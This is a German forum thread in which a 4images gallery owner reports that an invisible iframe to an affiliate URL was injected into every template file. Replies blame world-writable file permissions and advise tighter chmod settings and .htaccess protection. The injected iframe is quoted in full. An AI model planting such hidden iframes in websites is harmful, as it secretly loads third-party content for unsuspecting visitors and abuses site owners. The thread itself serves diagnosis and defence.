Gallerie wurde geSpamed / Hacked!!!

[darvid]

Hi,

ich war bisher eigentlich überzeugt von 4Images.
Heute jedoch musste ich bemerken, dass meine Webseite extrem langsam war. Das machte mich stutzig und sah im Quellcode nach.

Ein Spammer hatte in jede HTML Template Datei folgenden Iframe platziert:

Code: [Select]

<iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Das erscheint mir einleuchtend, laut Anleitung sollen ja alle Template Dateien die vollen Zugriffs, Lese und Schreibrechte bekommen (chmod 777).

Ist das eine Sicherheitslücke bei 4images oder mein Fehler?

Jedensfalls ist mein zuvor 100% positiver Eindruck von 4images jetzt getrügt und ich werde die Rechte auf das Minimum runterbrechen.

[kai]

Hallo,

handelt es sich um http://www.pilotenbilder.de/index2.php ?

Powered by 4images 1.7  ?

[KurtW]

Hallo,
laut install doc:
http://www.4homepages.de/forum/index.php?topic=7400.0

chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default"
chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default/media"

Dies ist aber auch nur nötig, weil über das ACP die templates editiert werden können.
Ich habe kein template mit 666, alles über ftp...

Hinweis:  einige .php files, die ich vor ca. 1 Monat versehentlich mit 666 eingestellt habe, wurden gleichfalls mit einem
iframe Code am Ende jeder Datei versehen/ gehackt.


Gruß
Kurt

[honda2000]

CHMOD777 ist doch nur in dem augenblick norwendig, wo template-Dateien über das ControlPanel editiert werden, danach stellt man die sofort auf 644 zurück!!

daraf ich mal bescheiden fragen, wieso ihr eueren Admin-Ordner nicht mit einer .htaccess + htpasswd schützt???